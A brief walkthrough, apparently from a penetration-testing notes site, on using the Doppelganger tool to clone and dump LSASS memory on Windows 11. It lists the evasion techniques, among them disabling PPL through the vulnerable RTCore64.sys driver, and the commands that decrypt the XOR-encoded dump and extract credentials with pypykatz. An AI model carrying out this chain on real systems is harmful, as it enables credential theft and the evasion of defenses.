Doppelganger: Cloning and Dumping LSASS (Win11)
PreviousExtracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuiteNextCVE & Exploits / CTF
Last updated
Was this helpful?
Last updated
Was this helpful?
Dynamic API resolution with obfuscation
SYSTEM token manipulation
Process cloning with NtCreateProcessEx
Direct memory access via RTCore64.sys to disable PPL
XOR encryption for stealth dump writing on disk
Doppelganger.exe (execute)
put the driver into the Public Folder: (RTCore64.sys)
Execute: Doppelganger.exe
use pypykatz to get the credentials ┌──(kali㉿kali)-[~/Downloads] └─$ pypykatz lsa minidump doppelganger.dmp.dec
user the xor python script to unxored the created dump: ──(kali㉿kali)-[~/Downloads] └─$ python xored.py doppelganger.dmp [+] Decryption successful. Output written to: doppelganger.dmp.dec